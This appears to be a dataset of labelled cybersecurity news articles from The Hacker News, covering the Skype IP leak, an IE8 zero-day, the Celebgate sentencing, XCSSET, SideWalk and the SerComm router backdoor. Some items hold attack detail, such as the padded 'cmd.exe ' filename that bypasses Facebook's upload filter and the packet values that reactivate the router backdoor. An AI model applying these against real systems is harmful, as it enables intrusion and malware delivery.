The script is for instance available on this site. Just enter the user name of a Skype user, fill out the captcha, and click the search button to initiate the lookup. You will receive the user's remote IP and port, as well as the local IP and port.
Adrian Asher, director of product Security, Skype ""We are investigating reports of a new tool that captures a Skype user's last known IP address. This is an ongoing, industry-wide issue faced by all peer-to-peer software companies. We are committed to the safety and security of our customers and we are takings measures to help protect them.""
The proof of concept is fairly simple. All an attacker needs to do is download a special Skype variant and alter a few registry keys to enable debug-log file creation.When adding a Skype contact, before sending the actual request, the victim's information card can be viewed. At this point, the log file records the user's IP address.
The software, posted on Pastebin, works on a patched version of Skype 5.5 and involves adding a few registry keys that allow the attacker to check the IP address of users currently online. Services like Whois will then give some other details on the city, country, internet provider and/or the internal IP-address of the target.
This particular flaw was discussed in a paper presented by an international team of researchers in November at the Internet Measurement Conference 2011 in Berlin.
There is currently no way of protecting yourself against the lookup of the IP address, other than not logging in to Skype when the software is not needed. The only other option would be the use of a virtual private network or proxy to hide the IP address from users who look it up.
",Vulnerability
Internet Explorer zero-day exploit targets U.S. nuke researchers,https://thehackernews.com/2013/05/internet-explorer-zero-day-exploit.html,"Security researchers revealed that series of ""Watering Hole"" has been conducted exploiting a IE8 zero-day vulnerability to target U.S. Government experts working on nuclear weapons research.
The news is not surprising but it is very concerning, the principal targets of the attacks are various groups of research such as the components of U.S. Department of Labor and the U.S. Department of Energy, the news has been confirmed by principal security firms and by Microsoft corporate.
The flaw has been used in a series of ""watering hole"" attacks, let's remind that ""Watering Hole"" is a technique of attack realized compromising legitimate websites using a ""drive-by"" exploit. The attackers restrict their audience to a individuals interested to specific content proposed by targeted website, in this way when the victim visits the page a backdoor Trojan is installed on his computer.
The website compromised to exploit the IE8 zero-day is the Dept. of Energy's Site Exposure Matrices (SEM) website, the site provides information on ""nuclear-related illnesses"" linked to Dept. of Energy facilities of employees who are experiencing health problems as a result of their professional activities.
Security community supposes that behind the exploits of IE8 zero-day flaw there is a group of Chinese hackers known as ""DeepPanda"" that hijacked visitors to a compromised website to deploy Poison Ivy Trojan through the execution of a ""drive-by download exploit"".
Security firm FireEye revealed that the new IE8 zero-day exploit is able to work against Internet Explorer 8 for all versions of Windows XP and above, including Windows Server 2003, 2008 and R2.
""This particular exploit checks for OS version, and only runs on Windows XP. We are able to reproduce the code execution and confirm it's a working zero-day exploit against IE8. During our research we also found the exploit constructs a ROP chain on non-ASLRed msvcrt.dll, and we verified it could also work against IE8 on Windows 7. So we believe there should be some other exploits targeting IE8 on Windows 7."" FireEye post states.
At the moment there isn't information on the information stolen but it is clear that the campaign discovered is related to a cyber espionage activity due the numerous classified documents managed by targeted departments.
Microsoft issued a security advisory on Friday announcing its investigation on the event and confirming it as a ""remote code execution vulnerability."", Microsoft confirmed on Friday that the IE8 zero-day vulnerability exists in Internet Explorer 8 for all versions of Windows XP and above are affected, including Windows Server 2003, 2008 and R2.
Microsoft noted that IE6 users on Windows XP, IE7, IE9, and IE10 users on Windows 8 and Surface tablets, are not affected by the security flaw.
Other precious suggestions provided by the advisory are:
Mitigating Factors:
By default, Internet Explorer on Windows Server 2003, Windows Server 2008, and Windows Server 2008 R2 runs in a restricted mode that is known as Enhanced Security Configuration. This mode mitigates this vulnerability.
By default, all supported versions of Microsoft Outlook, Microsoft Outlook Express, and Windows Mail open HTML email messages in the Restricted sites zone. The Restricted sites zone, which disables script and ActiveX controls, helps reduce the risk of an attacker being able to use this vulnerability to execute malicious code. If a user clicks a link in an email message, the user could still be vulnerable to exploitation of this vulnerability through the web-based attack scenario.
An attacker who successfully exploited this vulnerability could gain the same user rights as the current user. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.
In a web-based attack scenario, an attacker could host a website that contains a webpage that is used to exploit this vulnerability. In addition, compromised websites and websites that accept or host user-provided content or advertisements could contain specially crafted content that could exploit this vulnerability. In all cases, however, an attacker would have no way to force users to visit these websites. Instead, an attacker would have to convince users to visit the website, typically by getting them to click a link in an email message or Instant Messenger message that takes users to the attacker's website.
",Vulnerability
THN Report : ACER hacked because of their own stupidity !,https://thehackernews.com/2011/06/thn-report-acer-hacked-because-of-their.html,"THN Report : ACER hacked because of their own stupidity !
Yes ! you read right , ACER hacked because of their own stupidity. Yesterday we report that Pakistan Cyber Army hacked Acer Europe Server and 40,000 Users Data, Source Codes & Server Compromised .
Today we investigate on this and try to find out that how exactly Pakistan hackers got the FTP access . Here in above image you can see the screenshot taken by us from a ASP forum of Acer-Euro. Acer ASP Support Team posted some Hot Fix Release and give FTP access to other members , so that they can download that Hot Fix. This was posted on January 11, 2008 . Pakistan hackers got this and explore the FTP and In ""PB"" directory they get ""Country Wise Customer Data.zip"" file, which include the 40000 users data managed according to country wise.
Now this Data breach is only because of ACER's own Stupidity. The link of Forum post is ""https://asp.acer-euro.com/FORUM/Topic472-8-1.aspx"".
",Vulnerability
Malware Encoded Into DNA Hacks the Computer that Reads It,https://thehackernews.com/2017/08/hacking-computer-with-dna.html,"Do you know — 1 Gram of DNA Can Store 1,000,000,000 Terabyte of Data for 1000+ Years?
Even in March this year, a team of researchers successfully stored digital data — an entire operating system, a movie, an Amazon gift card, a study and a computer virus — in the strands of DNA.
But what if someone stores a malicious program into the DNA, just like an infected USB storage, to hijack the computer that reads it.
A team of researchers from the University of Washington in Seattle have demonstrated the first successful DNA-based exploit of a computer system that executes the malicious code written into the synthesised DNA strands while reading it.
To carry out the hack, the researchers created biological malware and encoded it in a short stretch of DNA, which allowed them to gain ""full control"" of a computer that tried to process the genetic data when read by a DNA sequencing machine.
The DNA-based hack becomes possible due to lack of security in multiple DNA processing software available online, which contains insecure function calls and buffer overflow vulnerabilities.
""We analysed the security of 13 commonly used, open source programs. We selected these programs methodically, choosing ones written in C/C++,"" reads the research paper [PDF], titled ""Computer Security, Privacy, and DNA Sequencing: Compromising Computers with Synthesized DNA, Privacy Leaks, and More.""
""We found that existing biological analysis programs have a much higher frequency of insecure C runtime library function calls (e.g., strcpy). This suggests that DNA processing software has not incorporated modern software security best practices.""
To create the biological malware, the researchers translated a simple computer program into a short stretch of 176 DNA letters, denoted as A, G, C, and T, each representing a binary pair (A=00, C=01, G=10, T=11).
The exploit took advantage of a basic buffer overflow attack, in which a software program executes the malicious command because it falls outside maximum length.
The command then contacted a server controlled by the team, from where the researchers took control of a computer in their laboratory they were using to analyse the DNA file.
""Our exploit did not target a program used by biologists in the field; rather it targeted one that we modified to contain a known vulnerability,"" the researchers said.
Although this kind of hack probably doesn't pose any threat anytime soon, the team warned that hackers could in future use fake blood or spit samples to gain access to computers, steal information, or hack medical equipments installed at forensic labs, hospitals and the DNA-based data storage centers.
The researchers will be presenting this first ""DNA-based exploit of a computer system"" at the next week's Usenix Security Symposium in Vancouver. For the more in-depth explanation on the DNA-based hack, you can head on to the research paper.
",Malware
"Hackers Can Steal $999,999.99 from Visa Contactless Payment Cards",https://thehackernews.com/2014/11/hackers-can-steal-99999999-from-visa.html,"Security researchers from Newcastle University in the UK have found a way to steal larger amounts of money from people's pockets using just a mobile phone, due to a security glitch Visa's contactless payment cards.
Contactless payment cards use a cryptoprocessor and RFID technology to perform secure transactions without a need to insert the card in a reader, even an NFC-equipped mobile device may also be used as a payment card. But there is a specified limits country-wise.
Contactless payment cards are meant to have a limit of £20 per purchase in UK, using which shoppers can buy things by simply tapping their card on a scanner, without having to type in a PIN. But exploiting a flaw in its protocol could allow cyber criminals to manipulate the cards to transfer up to $999,999.99 in foreign currency into a scammer's account.
Researchers on Wednesday at the 21st ACM Conference on Computer and Communications Security, detailed the attack which rely on a ""rogue POS terminal"" running on a mobile device that could be pre-set to a large amount of money, a wireless transfer of up to 999,999.99 units in any currency.
""With just a mobile phone we created a POS terminal that could read a card through a wallet,"" Martin Emms, lead researcher of the project noted in a statement about the findings. ""All the checks are carried out on the card rather than the terminal so at the point of transaction, there is nothing to raise suspicions.""
""By pre-setting the amount you want to transfer, you can bump your mobile against someone's pocket or swipe your phone over a wallet left on a table and approve a transaction. In our tests, it took less than a second for the transaction to be approved.""
The good news is that the research team haven't tested how Visa's system reacted to a rush of foreign currency transfers, and whether it would flag them up as a possible fraud or not.
But the experts are worried that the contactless payment cards system is insecure, and that cybercriminals would likely use the flaw to set up hundreds or thousands of fraudulent transactions in smaller amounts to evade detection.
""Our research has identified a real vulnerability in the payment protocol, which could open the door to potential fraud by criminals who are constantly looking for ways to breach the system,"" Emms said.
In a report on the BBC, Visa Europe said that ""we have reviewed Newcastle's findings as part of our continued focus on security and beating payments fraud"" and that their research ""does not take into account the multiple safeguards put into place throughout the Visa system"", adding that it would be ""very difficult to complete this type of transaction outside of a laboratory environment.""
Visa Europe also said that the company is updating its protection to require more payment card transactions to be authenticated online, making this kind of attack more difficult to carry out.
",Vulnerability
Hacker Who Leaked Celebrities' Personal Photos Gets 8 Months in Prison,https://thehackernews.com/2018/08/photos-celebrity-hacker.html,"George Garofano (left)
The fourth celebrity hacker—who was charged earlier this year with hacking into over 250 Apple iCloud accounts belonged to Jennifer Lawrence and other Hollywood celebrities—has been sentenced to eight months in prison.
Earlier this year, George Garofano, 26, of North Branford, admitted to illegally obtaining credentials of his victims' iCloud accounts using a phishing scheme, carried out from April 2013 to October 2014, in which he posed as a member of Apple's security team and tricked victims into revealing their iCloud credentials.
Using stolen credentials, Garofano then managed to steal victims' personal information, including their sensitive and intimate photographs and videos, from their iCloud accounts, and then leaked them on online forums, like 4Chan.
Among the victims were Jennifer Lawrence, Kim Kardashian, Kirsten Dunst, Kate Upton, American Olympic gold medallist Misty May Treanor and actors Alexandra Chando, Kelli Garner and Lauren O'Neil.
While prosecutors asked for a sentence of at least 10 to 16 months in prison, Garofano's lawyer requested the judge to give his client a lighter sentence of five months in prison and another five months of home confinement.
However, a federal judge at the US district court in Bridgeport on Wednesday sentenced Garofano to 8 months in prison and 3 years of supervised release after his prison term is over.
Garofano is one of the four hackers who stole and leaked celebrities' photographs in the 2014 event, which is well known as ""The Fappening"" or ""Celebgate"" scandal.
The other three Celebgate hackers had already been sentenced for their roles in the celebrity photo hack:
Edward Majerczyk, 28, was sentenced to nine months in prison after pleading guilty to felony hacking and violating Computer Fraud and Abuse Act.
Ryan Collins, 36, was sentenced to 18 months in prison after pleading guilty to the same.
Emilio Herrera, 32, pled guilty to the same but is still awaiting his sentencing.
While the US Attorney says there's no evidence that Majerczyk, Collins, or Herrera shared or posted the stolen photos online, prosecutors allege that Garofano, in some instances, also traded the stolen iCloud credentials and the victims' intimate images with other people.
Garofano, who is released on a $50,000 bond, will surrender on October 10, 2018, to serve his prison sentence.
The judge has also ordered Garofano to perform 60 hours of community service while he is on supervised release.
",Cyber_Attack
Facebook EXE attachment Vulnerability can Compromise with Users Security,https://thehackernews.com/2011/10/facebook-exe-attachment-vulnerability.html,"Facebook EXE attachment Vulnerability can Compromise with Users Security
Nathan Power from SecurityPentest has discovered new Facebook Vulnerability, that can easily attach EXE files in messages,cause possible User Credentials to be Compromised .
When using the Facebook 'Messages' tab, there is a feature to attach a file. Using this feature normally, the site won't allow a user to attach an executable file. A bug was discovered to subvert this security mechanisms. Note, you do NOT have to be friends with the user to send them a message with an attachment.
But Nathan Power Find the way to upload EXE . When uploading a file attachment to Facebook we captured the web browsers POST request being sent to the web server. Inside this POST request reads the line:
Content-Disposition: form-data; name=""attachment""; filename=""cmd.exe""
It was discovered the variable 'filename' was being parsed to determine if the file type is allowed or not. To subvert the security mechanisms to allow an .exe file type, we modified the POST request by appending a space to our filename variable like so:
filename=""cmd.exe ""
",Vulnerability
Malware That Spreads Via Xcode Projects Now Targeting Apple's M1-based Macs,https://thehackernews.com/2021/04/malware-spreads-via-xcode-projects-now.html,"A Mac malware campaign targeting Xcode developers has been retooled to add support for Apple's new M1 chips and expand its features to steal confidential information from cryptocurrency apps.
XCSSET came into the spotlight in August 2020 after it was found to spread via modified Xcode IDE projects, which, upon the building, were configured to execute the payload. The malware repackages payload modules to imitate legitimate Mac apps, which are ultimately responsible for infecting local Xcode projects and injecting the main payload to execute when the compromised project builds.
XCSSET modules come with the capabilities to steal credentials, capture screenshots, inject malicious JavaScript into websites, plunder user data from different apps, and even encrypt files for a ransom.
Then in March 2021, Kaspersky researchers uncovered XCSSET samples compiled for the new Apple M1 chips, suggesting that the malware campaign was not only ongoing but also that adversaries are actively adapting their executables and porting them to run on new Apple Silicon Macs natively.
The latest research by Trend Micro shows that XCSSET continues to abuse the development version of the Safari browser to plant JavaScript backdoors onto websites via Universal Cross-site Scripting (UXSS) attacks.
""It hosts Safari update packages in the [command-and-control] server, then downloads and installs packages for the user's OS version,"" Trend Micro researchers said in an analysis published on Friday. ""To adapt to the newly-released Big Sur, new packages for 'Safari 14' were added.""
In addition to trojanizing Safari to exfiltrate data, the malware is also known for exploiting the remote debugging mode in other browsers such as Google Chrome, Brave, Microsoft Edge, Mozilla Firefox, Opera, Qihoo 360 Browser, and Yandex Browser to carry out UXSS attacks.
What's more, the malware now even attempts to steal account information from multiple websites, including NNCall.net, Envato, and 163.com, and cryptocurrency trading platforms like Huobi and Binance, with abilities to replace the address in a user's cryptocurrency wallet with those under the attacker's control.
XCSSET's mode of distribution via doctored Xcode projects poses a serious threat, as affected developers who unwittingly share their work on GitHub could pass on the malware to their users in the form of the compromised Xcode projects, leading to ""a supply-chain-like attack for users who rely on these repositories as dependencies in their own projects.""
",Malware
New Systemd Privilege Escalation Flaws Affect Most Linux Distributions,https://thehackernews.com/2019/01/linux-systemd-exploit.html,"Security researchers have discovered three vulnerabilities in Systemd, a popular init system and service manager for most Linux operating systems, that could allow unprivileged local attackers or malicious programs to gain root access on the targeted systems.
The vulnerabilities, assigned as CVE-2018-16864, CVE-2018-16865, and CVE-2018-16866, actually resides in the ""systemd-journald"" service that collects information from different sources and creates event logs by logging information in the journal.
The vulnerabilities, which were discovered and reported by security researchers at Qualys, affect all systemd-based Linux distributions, including Redhat and Debian, according to the researchers.
However, some Linux distros such as SUSE Linux Enterprise 15, openSUSE Leap 15.0, and Fedora 28 and 29 are not affected, as ""their userspace [code] is compiled with GCC's -fstack-clash-protection.""
The first two flaws are memory corruptions issues, while the third one is an out-of-bounds read issue in systemd-journald that can leak sensitive process memory data.
Researchers have successfully created proof-of-concept exploits, which they are planning to release in the near future.
""We developed an exploit for CVE-2018-16865 and CVE-2018-16866 that obtains a local root shell in 10 minutes on i386 and 70 minutes on amd64, on average,"" the researchers write in an advisory published Wednesday.
CVE-2018-16864 is similar to a Stack Clash vulnerability Qualys researchers discovered in 2017 that can be exploited by malware or low privileged users to escalate their permission to root.
According to the researchers, CVE-2018-16864 existed in systemd's codebase since April 2013 (systemd v203) and became exploitable in February 2016 (systemd v230), while CVE-2018-16865 was introduced in December 2011 (systemd v38) and became exploitable in April 2013 (systemd v201), Qualys says.
However, the third vulnerability (CVE-2018-16866) was introduced in systemd's codebase in June 2015 (systemd v221), but according to the researchers, it was ""inadvertently fixed in August 2018.""
If you are using a vulnerable Linux system, keep tabs on the latest updates by your respective Linux distribution and install the patches as soon as they are released.
",Vulnerability
Feds Secretly Ran a Fake Encrypted Chat App and Busted Over 800 Criminals,https://thehackernews.com/2021/06/feds-secretly-ran-fake-encrypted-chat.html,"In an unprecedented sting operation, the U.S. Federal Bureau of Investigation (FBI) and Australian Federal Police (AFP) ran an encrypted chat service called ANoM for nearly three years to intercept 27 million messages exchanged between criminal gang members globally.
Dubbed Operation Ironside (AFP), Operation Greenlight (Europol), and Operation Trojan Shield (FBI), the long-term covert probe into transnational and serious organized crime culminated in the arrests of 224 offenders on 526 charges in Australia, with 55 luxury vehicles, eight tons of cocaine, 22 tons of cannabis and cannabis resin, 250 firearms, and more than $48 million in various currencies and cryptocurrencies seized in raids around the world.
A total of more than 800 arrests have been reported across 18 countries, including New Zealand, Germany, and Sweden. Europol called it the ""biggest ever law enforcement operation against encrypted communication.""
The communications allegedly involved plots to kill, orchestrate mass drug trafficking, and gun distribution, according to the AFP, which gained lawful access to these encrypted messages through using the Telecommunications and Other Legislation Amendment (Assistance and Access) Act 2018.
""For almost three years, the AFP and the FBI have monitored criminals' encrypted communications over a Dedicated Encrypted Communications Platform,"" AFP said. ""The AFP built a capability that allowed law enforcement to access, decrypt and read communications on the platform. The AFP and FBI were able to capture all the data sent between devices using the platform.""
The cryptographic barriers were surmounted by inserting a master key into ANoM's encryption system that was stealthily attached to every message, thus enabling the law enforcement to execute a man-in-the-middle (MitM) scheme to decrypt and retrieve the messages as they were transmitted.
For devices located outside of the U.S., an encrypted ""BCC"" copy of the messages was forwarded to a server located in an unnamed third country, from where it was forwarded to a second FBI-owned server for subsequent decryption.
ANoM (aka Anøm) is said to have been intentionally created to fill the vacuum left by Phantom Secure, another encrypted phone service dismantled by the FBI in 2018, thereby allowing the agencies to eavesdrop on the conversations unbeknownst to the criminals.
In a move echoing that of Phantom Secure, criminals needed to be part of a closed network to get hold of a phone on which ANoM came preinstalled, while the devices themselves were stripped of all other functionality.
Among some of the features of the app included the ability to —
Send encrypted text and voice messages
Make secure voice calls
Share photos, videos, animated GIFs, locations, drawings, and
Send files of any type
In addition, phone owners also had the option to verify their contacts via a QR code, create distribution lists, and chat completely anonymously without even requiring a phone number, according to a listing from the now taken down anom.io website.
Operation Ironside follows similar law enforcement actions that involved infiltrating encrypted chat platform EncroChat to tap millions of encrypted messages sent by organized crime networks through the platform. Earlier this year, a coordinated exercise under the name ""Operation Argus"" staged major interventions against Sky ECC, leading to nearly 275 raids and the arrest of 91 suspects, besides seizing 17 tonnes of cocaine and €1.2 million.
A Trojan Horse to Trap Crime Syndicates
In controlling the encrypted chat network right from its inception in 2018, ANoM was a cleverly designed trap meant to ensnare domestic and international organized crime syndicates who had previously relied on other platforms to facilitate murders and drug smuggling.
To that end, the FBI recruited a confidential human source, who had previously sold phones from both Phantom Secure and Sky Global to criminal organizations and had ""invested a substantial amount of money into the development of a new hardened encrypted device"" (i.e., ANoM), to penetrate the crime networks and distribute the devices.
Besides agreeing to cooperate with law enforcement authorities for the possibility of a reduced prison sentence, the FBI paid the informant $179,508 for the services rendered as well as for living and travel expenses.
""The devices organically circulated and grew in popularity among criminals, who were confident of the legitimacy of the app because high-profile organised crime figures vouched for its integrity,"" the AFP said. By May 2021, the phones, which were procured from the black market, had increased to 11,800 in number, of which about 9,000 are in active use, spanning over 300 criminal syndicates operating in more than 100 countries.
The top five countries where ANoM devices are currently used are Germany, the Netherlands, Spain, Australia, and Serbia, unsealed court documents show, with its user base having grown significantly in the aftermath of Sky ECC's disruption.
""After the takedown of Sky ECC in March 2021, many organised crime networks sought a quick encrypted replacement for a communication platform that would allow them to evade law enforcement detection,"" Europol said. ""This was a deliberate and strategic aspect of OTF Greenlight / Operation Trojan Shield resulting in the migration of some of the criminal Sky ECC customer base to the FBI-managed platform ANoM.""
The international coalition that participated in the joint operation consisted of Australia, Austria, Canada, Denmark, Estonia, Finland, Germany, Hungary, Lithuania, New Zealand, the Netherlands, Norway, Sweden, the U.K. (including Scotland), and the U.S.
""A goal of the Trojan Shield investigation is to shake the confidence in this [hardened encrypted device] industry because the FBI is willing and able to enter this space and monitor messages,"" the court documents stated.
",Malware
New SideWalk Backdoor Targets U.S.-based Computer Retail Business,https://thehackernews.com/2021/08/new-sidewalk-backdoor-targets-us-based.html,"A computer retail company based in the U.S. was the target of a previously undiscovered implant called SideWalk as part of a recent campaign undertaken by a Chinese advanced persistent threat group primarily known for singling out entities in East and Southeast Asia.
Slovak cybersecurity firm ESET attributed the malware to an advanced persistent threat it tracks under the moniker SparklingGoblin, an adversary believed to be connected to the Winnti umbrella group, noting its similarities to another backdoor dubbed Crosswalk that was put to use by the same threat actor in 2019.
""SideWalk is a modular backdoor that can dynamically load additional modules sent from its C&C [command-and-control] server, makes use of Google Docs as a dead drop resolver, and Cloudflare workers as a C&C server,"" ESET researchers Thibaut Passilly and Mathieu Tartare said in a report published Tuesday. ""It can also properly handle communication behind a proxy.""
Since first emerging on the threat landscape in 2019, SparklingGoblin has been linked to several attacks aimed at Hong Kong universities using backdoors such as Spyder and ShadowPad, the latter of which has become a preferred malware of choice among multiple Chinese threat clusters in recent years.
Over the past year, the collective has hit a broad range of organizations and verticals around the world, with a particular focus on the academic institutions located in Bahrain, Canada, Georgia, India, Macao, Singapore, South Korea, Taiwan, and the U.S. Other targeted entities include media companies, religious organizations, e-commerce platforms, computer and electronics manufacturers, and local governments.
SideWalk is characterized as an encrypted shellcode, which is deployed via a .NET loader that takes care of ""reading the encrypted shellcode from disk, decrypting it and injecting it into a legitimate process using the process hollowing technique."" The next phase of the infection commences with SideWalk establishing communications with the C&C server, with the malware retrieving the encrypted IP address from a Google Docs document.
""The decrypted IP address is 80.85.155[.]80. That C&C server uses a self-signed certificate for the facebookint[.]com domain. This domain has been attributed to BARIUM by Microsoft, which partially overlaps with what we define as Winnti Group. As this IP address is not the first one to be used by the malware, it is considered to be the fallback one,"" the researchers said.
Besides using HTTPS protocol for C&C communications, SideWalk is designed to load arbitrary plugins sent from the server, amass information about running processes, and exfiltrate the results back to the remote server.
""SideWalk is a previously undocumented backdoor used by the SparklingGoblin APT group. It was most likely produced by the same developers as those behind CROSSWALK, with which it shares many design structures and implementation details,"" the researchers concluded.
",Malware
"NSA will not stop spying on us, next move Quantum computer to break strongest Encryption",https://thehackernews.com/2014/01/nsa-will-not-stop-spying-on-us-next.html,"Image Credit: The guardian
If I say that NSA (National Security Agency) will never stop spying on us then it won't be wrong. After the exposure of the large number of surveillance scandals including PRISM, DROPOUTJEEP, XKeyscore and many many more which are now publicly known as well as unknown, Will NSA ever stop Privacy breach?
Obviously 'NO'. That I can predict from another Snowden leak published by the Washington Post news website recently i.e. US National Security Agency (NSA) is trying to develop a futuristic super computer called 'Quantum computer' that could be capable of breaking almost every kind of encryption on the computer used to protect banks, medical, business including top-secret information held by government around the world.
The Project is specified as ""Penetrating Hard Targets"" in the document and is a part of $79.7 million research program. The Washington Post says that the research is being done at the University of Maryland's Laboratory for Physical Sciences.
The goal of creating a working quantum computer is to boost encryption cracking capabilities against world's strongest encryption i.e. RSA - commonly used in Web browsers for encrypted emails and secure financial transactions.
RT News reports:
The basic principle in quantum computing is ""quantum superposition,"" or the idea that an object simultaneously exists in all states. A classic computer uses binary bits, or zeroes and ones. A quantum computer uses quantum bits, or qubits, that are simultaneously zero and one. While a classic computer must do one calculation at a time, a quantum computer can achieve a correct answer much faster and efficiently through parallel processing, with no need to run those calculations.
The progress of the NSA's Project on such computer is not known, but Snowden's documents suggested that the agency is no closer to building a quantum computer and it is difficult to attain because of the fragile nature of such computers.
His disclosures not only threatened the whole world but also surprised his own citizens who have the thing called the Constitution and in that constitution has a 'Bill of rights', one of which is the 4th amendment says:
The right of the people to be secure in their persons, houses, papers, and effects, against unreasonable searches and seizures, shall not be violated, and no Warrants shall issue, but upon probable cause, supported by Oath or affirmation, and particularly describing the place to be searched, and the persons or things to be seized.
Now when the IT World is facing massive security breaches like Target, Adobe, Linkedin, Snapchat due to the lack of good encryption practices and Malware threats like Cryptolocker - due to the strongest encryption, but the NSA is doing NOTHING to defend people against such threats.
I suppose the dedication of NSA to save the world and to developing the strongest encryptions, rather they are ruining the user' privacy and security community by targeting encryption, tapping telephones, accessing email, hacking iPhone etc. At the same time such activities by National Security Agencies are also motivating the cyber criminals to do the same.
Here you can read all NSA Stories published on 'The Hacker News' - Click Here.
",Malware
Disgusting! Ashley Madison was Building an App – 'What's your Wife Worth?',https://thehackernews.com/2015/08/ashley-madison-whats-your-wife-worth-app.html,"We could expect Ashley Madison to cross any limits when it comes to cheating, but this is WORSE.
After all the revelations made by the Impact Team past week, this was something different from the leaked data that had names, password and other details of Ashley Madison clients.
A dump from the leaked files unfold awful strategy of Avid Life Media (ALM), Ashley Madison's parent company, to launch an app called ""What's your wife worth.""
As the name says it all, the app allows men to Rate each others Wives.
Know Your Wife Worth
'What's your wife worth' was discovered in a June 2013 email exchanged between Noel Biderman, ALM's chief executive and Brian Offenheim, ALM's vice president of creative and design, which said that Biderman suggested Offenheim about the probable outlook of the app.
He suggested options like ""Choice should be 'post your wife' and 'bid on someone's wife',"" also mentioning: ""I am not sure we should be asking for real names—rather usernames.""
To which Offenheim gave some feedback, by attaching a dummy of the app's sign up design, which appeared something like this:
Though Biderman liked it, somehow the app's development was not completed and the idea was dumped, as one of Biderman's colleagues referred the concept as horrible in the emails.
We are in a dilemma - whether the person referred to app's development as horrible or the idea behind the thought of developing such an app!
There were more than 197,000 emails that were leaked from Biderman's inbox by the hackers calling themselves as the Impact Team last Friday.
Besides this the hackers released personal information of more than 33 Million Ashley Madison accounts. Which led to suicides as well.
",Data_Breaches
Routers TCP 32764 Backdoor Vulnerability Secretly Re-Activated Again,https://thehackernews.com/2014/04/router-manufacturers-secretly-added-tcp.html,"At the beginning of this year, we reported about the secret backdoor 'TCP 32764' discovered in several routers including, Linksys, Netgear, Cisco and Diamond that allowed an attacker to send commands to the vulnerable routers at TCP port 32764 from a command-line shell without being authenticated as the administrator.
The Reverse-engineer from France Eloi Vanderbeken, who discovered this backdoor has found that although the flaw has been patched in the latest firmware release, but SerComm has added the same backdoor again in another way.
To verify the released patch, recently he downloaded the patched firmware version 1.1.0.55 of Netgear DGN1000 and unpacked it using binwalk tool. He found that the file 'scfgmgr' which contains the backdoor is still present there with a new option ""-l"", that limits it only for a local socket interprocess communication (Unix domain socket), or only for the processes running on the same device.
On further investigation via reverse engineering the binaries, he found another mysterious tool called 'ft_tool' with ""-f""option that could re-activates the TCP backdoor.
In his illustrated report (shown below), he explained that 'ft_tool' actually open a raw socket, that listens incoming packages and attackers on the local network can reactivate the backdoor at TCP port 32764 by sending the following specific packets:
EtherType parameter should be equal to '0x8888'.
Payload should contains MD5 hash of the value DGN1000 (45d1bb339b07a6618b2114dbc0d7783e).
The package type should be 0x201.
So, an attacker can reactivate the TCP 32764 backdoor in order to execute the shell commands on the vulnerable SerComm routers even after installing the patched version.
Now question rises, why the routers manufacturers are adding intentional backdoors again and again?? May be the reason behind to be a helping hand for the U.S. intelligence agency NSA.
Currently there is no patch available for newly discovered backdoor. If you want to check your wireless router for this backdoor, you can download Proof-of-Concept (PoC) exploit released by the researcher from here or follow the below given steps manually:
Use 'binwalk -e' to extract the file system
Search for 'ft_tool' or grep -r 'scfgmgr -f
Use IDA to confirm.
",Vulnerability
"Shadow Brokers, Who Leaked WannaCry SMB Exploit, Are Back With More 0-Days",https://thehackernews.com/2017/05/shodow-brokers-wannacry-hacking.html,"The infamous hacking collective Shadow Brokers – the one who leaked the Windows SMB exploit in public that led to last weekend's WannaCrypt menace – are back, this time, to cause more damage.
In typically broken English, the Shadow Brokers published a fresh statement (with full of frustration) a few hours ago, promising to release more zero-day bugs and exploits for various desktop and mobile platforms starting from June 2017.
However, this time the Shadow Brokers leaks will not be available for everybody, as the hacking collective said:
""TheShadowBrokers is launching new monthly subscription model. Is being like [the] wine of month club. Each month peoples can be paying membership fee, then getting members only data dump each month.""
To some extent, this is good news, but it is terrible news too. Good because now all these upcoming alleged unpatched vulnerabilities will be patched after being disclosed and terrible because the group will sell new zero-day exploits and hacking tools to private members with paid monthly subscription, instead of telling them to Microsoft.
Apparently, other hackers, criminal gangs, state-sponsored hackers, maybe some journalists and people from tech companies, would naturally join Shadow Brokers' membership.
Get Ready for the 'Wine of Month Club'
So, anyone buying the membership of the ""wine of month club"" would be able to get exclusive access to the upcoming leaks, which the Shadow Brokers claims would include:
Exploits for web browsers, routers, and smartphones.
Exploits for operating systems, including Windows 10.
Compromised data from banks and Swift providers.
Stolen network information from Russian, Chinese, Iranian, and North Korean nuclear missile programs.
The claims made by the group remain unverified at the time of writing, but since the Shadow Brokers' previously released data dump turned out to be legitimate, the group's statement should be taken seriously, at least now, when we know the EternalBlue exploit and DoublePulsar backdoor developed by the NSA and released by the Shadow Brokers last month was used by WannaCry to cause chaos worldwide.
Before publicly dumping these exploits in April, the Shadow Brokers put an auction of cyber weapons stolen from NSA's elite hacking team called Equation Group for 1 Million Bitcoin.
After failed auction, the hacking group even put up those hacking tools and exploits for direct sale on an underground site, categorizing them into a type — like ""exploits,"" ""Trojans,"" and ""implant"" — each of which ranged from 1 to 100 Bitcoins (from $780 to $78,000).
After failure from all sides, the group started leaking those hacking exploits. Last month, the Shadow Brokers released a Microsoft Windows SMB exploit that was used by the WannaCry ransomware, which infected 200,000 machines in 150 countries within just 48 hours.
While talking about the WannaCry ties with North Korean state-sponsored hacking group Lazarus Group, the group said:
""The Oracle is telling theshadowbrokers North Korea is being responsible for the global cyber attack Wanna Cry. Nukes and cyber attacks, America has to go to war, no other choices!""
Shadow Brokers Lashed out on US Government and Tech Companies
In its recent post, the Shadow Brokers criticized both the US government and tech companies, such as Microsoft, for not cracking down on the exploits when they had the chance, months before their release.
The hacking group said the US government is paying tech companies not to patch zero-days in their products, claiming that it has spies inside Microsoft among other US tech firms.
The Shadow Brokers even accused Google Project Zero team, saying:
""TheShadowBrokers is thinking Google Project Zero is having some former TheEquationGroup member. Project Zero recently releasing ""Wormable Zero-Day"" Microsoft patching in record time, knowing it was coming? Coincidence?""
Who knows if these accusation made by the Shadow Brokers group are true or not, but the world should be well prepared for another WannaCry-like massive destroyer.
",Vulnerability
Pro-Tibetan activists become victim of Spear Phishing,https://thehackernews.com/2012/04/pro-tibetan-activists-become-victim-of.html,"Pro-Tibetan activists become victim of Spear Phishing
Hackers are ramping up their attacks against Tibetan activists and are using increasingly sophisticated techniques to deliver malware An interesting example of such a malicious email has recently been spotted by FireEye researcher Alex Lanstein, who is currently monitoring these spam campaigns.
